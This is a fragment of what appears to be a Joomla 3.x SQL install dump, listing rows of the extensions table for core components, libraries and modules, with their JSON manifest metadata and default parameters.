(29, 0, 'com_tags', 'component', 'com_tags', '', 1, 1, 1, 1, '{\"name\":\"com_tags\",\"type\":\"component\",\"creationDate\":\"December 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"COM_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(30, 0, 'com_contenthistory', 'component', 'com_contenthistory', '', 1, 1, 1, 0, '{\"name\":\"com_contenthistory\",\"type\":\"component\",\"creationDate\":\"May 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_CONTENTHISTORY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contenthistory\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(31, 0, 'com_ajax', 'component', 'com_ajax', '', 1, 1, 1, 1, '{\"name\":\"com_ajax\",\"type\":\"component\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_AJAX_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"ajax\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(32, 0, 'com_postinstall', 'component', 'com_postinstall', '', 1, 1, 1, 1, '{\"name\":\"com_postinstall\",\"type\":\"component\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_POSTINSTALL_XML_DESCRIPTION\",\"group\":\"\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(33, 0, 'com_fields', 'component', 'com_fields', '', 1, 1, 1, 0, '{\"name\":\"com_fields\",\"type\":\"component\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"COM_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(34, 0, 'com_associations', 'component', 'com_associations', '', 1, 1, 1, 0, '{\"name\":\"com_associations\",\"type\":\"component\",\"creationDate\":\"January 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"COM_ASSOCIATIONS_XML_DESCRIPTION\",\"group\":\"\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(35, 0, 'com_privacy', 'component', 'com_privacy', '', 1, 1, 1, 1, '{\"name\":\"com_privacy\",\"type\":\"component\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"COM_PRIVACY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacy\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(36, 0, 'com_actionlogs', 'component', 'com_actionlogs', '', 1, 1, 1, 1, '{\"name\":\"com_actionlogs\",\"type\":\"component\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"COM_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\"}', '{\"ip_logging\":0,\"csv_delimiter\":\",\",\"loggable_extensions\":[\"com_banners\",\"com_cache\",\"com_categories\",\"com_checkin\",\"com_config\",\"com_contact\",\"com_content\",\"com_installer\",\"com_media\",\"com_menus\",\"com_messages\",\"com_modules\",\"com_newsfeeds\",\"com_plugins\",\"com_redirect\",\"com_tags\",\"com_templates\",\"com_users\"]}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(102, 0, 'LIB_PHPUTF8', 'library', 'phputf8', '', 0, 1, 1, 1, '{\"name\":\"LIB_PHPUTF8\",\"type\":\"library\",\"creationDate\":\"2006\",\"author\":\"Harry Fuecks\",\"copyright\":\"Copyright various authors\",\"authorEmail\":\"hfuecks@gmail.com\",\"authorUrl\":\"http:\\/\\/sourceforge.net\\/projects\\/phputf8\",\"version\":\"0.5\",\"description\":\"LIB_PHPUTF8_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phputf8\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(103, 0, 'LIB_JOOMLA', 'library', 'joomla', '', 0, 1, 1, 1, '{\"name\":\"LIB_JOOMLA\",\"type\":\"library\",\"creationDate\":\"2008\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"https:\\/\\/www.joomla.org\",\"version\":\"13.1\",\"description\":\"LIB_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}', '{\"mediaversion\":\"16e6a66be7b6c6c07bf575a23a15fcbc\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(104, 0, 'LIB_IDNA', 'library', 'idna_convert', '', 0, 1, 1, 1, '{\"name\":\"LIB_IDNA\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"phlyLabs\",\"copyright\":\"2004-2011 phlyLabs Berlin, http:\\/\\/phlylabs.de\",\"authorEmail\":\"phlymail@phlylabs.de\",\"authorUrl\":\"http:\\/\\/phlylabs.de\",\"version\":\"0.8.0\",\"description\":\"LIB_IDNA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"idna_convert\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(105, 0, 'FOF', 'library', 'fof', '', 0, 1, 1, 1, '{\"name\":\"FOF\",\"type\":\"library\",\"creationDate\":\"2015-04-22 13:15:32\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2015 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.4.3\",\"description\":\"LIB_FOF_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fof\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(106, 0, 'LIB_PHPASS', 'library', 'phpass', '', 0, 1, 1, 1, '{\"name\":\"LIB_PHPASS\",\"type\":\"library\",\"creationDate\":\"2004-2006\",\"author\":\"Solar Designer\",\"copyright\":\"\",\"authorEmail\":\"solar@openwall.com\",\"authorUrl\":\"http:\\/\\/www.openwall.com\\/phpass\\/\",\"version\":\"0.3\",\"description\":\"LIB_PHPASS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phpass\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(200, 0, 'mod_articles_archive', 'module', 'mod_articles_archive', '', 0, 1, 1, 0, '{\"name\":\"mod_articles_archive\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_archive\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(201, 0, 'mod_articles_latest', 'module', 'mod_articles_latest', '', 0, 1, 1, 0, '{\"name\":\"mod_articles_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_NEWS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_latest\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(202, 0, 'mod_articles_popular', 'module', 'mod_articles_popular', '', 0, 1, 1, 0, '{\"name\":\"mod_articles_popular\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_popular\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(203, 0, 'mod_banners', 'module', 'mod_banners', '', 0, 1, 1, 0, '{\"name\":\"mod_banners\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BANNERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_banners\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(204, 0, 'mod_breadcrumbs', 'module', 'mod_breadcrumbs', '', 0, 1, 1, 1, '{\"name\":\"mod_breadcrumbs\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BREADCRUMBS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_breadcrumbs\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(205, 0, 'mod_custom', 'module', 'mod_custom', '', 0, 1, 1, 1, '{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_custom\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(206, 0, 'mod_feed', 'module', 'mod_feed', '', 0, 1, 1, 0, '{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_feed\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(207, 0, 'mod_footer', 'module', 'mod_footer', '', 0, 1, 1, 0, '{\"name\":\"mod_footer\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FOOTER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_footer\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(208, 0, 'mod_login', 'module', 'mod_login', '', 0, 1, 1, 1, '{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_login\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(209, 0, 'mod_menu', 'module', 'mod_menu', '', 0, 1, 1, 1, '{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_menu\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(210, 0, 'mod_articles_news', 'module', 'mod_articles_news', '', 0, 1, 1, 0, '{\"name\":\"mod_articles_news\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_NEWS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_news\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(211, 0, 'mod_random_image', 'module', 'mod_random_image', '', 0, 1, 1, 0, '{\"name\":\"mod_random_image\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RANDOM_IMAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_random_image\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(212, 0, 'mod_related_items', 'module', 'mod_related_items', '', 0, 1, 1, 0, '{\"name\":\"mod_related_items\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RELATED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_related_items\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(213, 0, 'mod_search', 'module', 'mod_search', '', 0, 1, 1, 0, '{\"name\":\"mod_search\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SEARCH_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_search\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(214, 0, 'mod_stats', 'module', 'mod_stats', '', 0, 1, 1, 0, '{\"name\":\"mod_stats\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_stats\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(215, 0, 'mod_syndicate', 'module', 'mod_syndicate', '', 0, 1, 1, 1, '{\"name\":\"mod_syndicate\",\"type\":\"module\",\"creationDate\":\"May 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SYNDICATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_syndicate\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(216, 0, 'mod_users_latest', 'module', 'mod_users_latest', '', 0, 1, 1, 0, '{\"name\":\"mod_users_latest\",\"type\":\"module\",\"creationDate\":\"December 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_USERS_LATEST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_users_latest\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(218, 0, 'mod_whosonline', 'module', 'mod_whosonline', '', 0, 1, 1, 0, '{\"name\":\"mod_whosonline\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WHOSONLINE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_whosonline\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(219, 0, 'mod_wrapper', 'module', 'mod_wrapper', '', 0, 1, 1, 0, '{\"name\":\"mod_wrapper\",\"type\":\"module\",\"creationDate\":\"October 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WRAPPER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_wrapper\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(220, 0, 'mod_articles_category', 'module', 'mod_articles_category', '', 0, 1, 1, 0, '{\"name\":\"mod_articles_category\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_category\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(221, 0, 'mod_articles_categories', 'module', 'mod_articles_categories', '', 0, 1, 1, 0, '{\"name\":\"mod_articles_categories\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_categories\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(222, 0, 'mod_languages', 'module', 'mod_languages', '', 0, 1, 1, 1, '{\"name\":\"mod_languages\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"MOD_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_languages\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(223, 0, 'mod_finder', 'module', 'mod_finder', '', 0, 1, 0, 0, '{\"name\":\"mod_finder\",\"type\":\"module\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_finder\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(300, 0, 'mod_custom', 'module', 'mod_custom', '', 1, 1, 1, 1, '{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_custom\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(301, 0, 'mod_feed', 'module', 'mod_feed', '', 1, 1, 1, 0, '{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_feed\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(302, 0, 'mod_latest', 'module', 'mod_latest', '', 1, 1, 1, 0, '{\"name\":\"mod_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_latest\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(303, 0, 'mod_logged', 'module', 'mod_logged', '', 1, 1, 1, 0, '{\"name\":\"mod_logged\",\"type\":\"module\",\"creationDate\":\"January 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGGED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_logged\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(304, 0, 'mod_login', 'module', 'mod_login', '', 1, 1, 1, 1, '{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"March 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_login\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(305, 0, 'mod_menu', 'module', 'mod_menu', '', 1, 1, 1, 0, '{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_menu\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(307, 0, 'mod_popular', 'module', 'mod_popular', '', 1, 1, 1, 0, '{\"name\":\"mod_popular\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_popular\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(308, 0, 'mod_quickicon', 'module', 'mod_quickicon', '', 1, 1, 1, 1, '{\"name\":\"mod_quickicon\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_QUICKICON_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_quickicon\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(309, 0, 'mod_status', 'module', 'mod_status', '', 1, 1, 1, 0, '{\"name\":\"mod_status\",\"type\":\"module\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATUS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_status\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(310, 0, 'mod_submenu', 'module', 'mod_submenu', '', 1, 1, 1, 0, '{\"name\":\"mod_submenu\",\"type\":\"module\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SUBMENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_submenu\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(311, 0, 'mod_title', 'module', 'mod_title', '', 1, 1, 1, 0, '{\"name\":\"mod_title\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TITLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_title\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(312, 0, 'mod_toolbar', 'module', 'mod_toolbar', '', 1, 1, 1, 1, '{\"name\":\"mod_toolbar\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TOOLBAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_toolbar\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(313, 0, 'mod_multilangstatus', 'module', 'mod_multilangstatus', '', 1, 1, 1, 0, '{\"name\":\"mod_multilangstatus\",\"type\":\"module\",\"creationDate\":\"September 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MULTILANGSTATUS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_multilangstatus\"}', '{\"cache\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(314, 0, 'mod_version', 'module', 'mod_version', '', 1, 1, 1, 0, '{\"name\":\"mod_version\",\"type\":\"module\",\"creationDate\":\"January 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_VERSION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_version\"}', '{\"format\":\"short\",\"product\":\"1\",\"cache\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(315, 0, 'mod_stats_admin', 'module', 'mod_stats_admin', '', 1, 1, 1, 0, '{\"name\":\"mod_stats_admin\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_stats_admin\"}', '{\"serverinfo\":\"0\",\"siteinfo\":\"0\",\"counter\":\"0\",\"increase\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
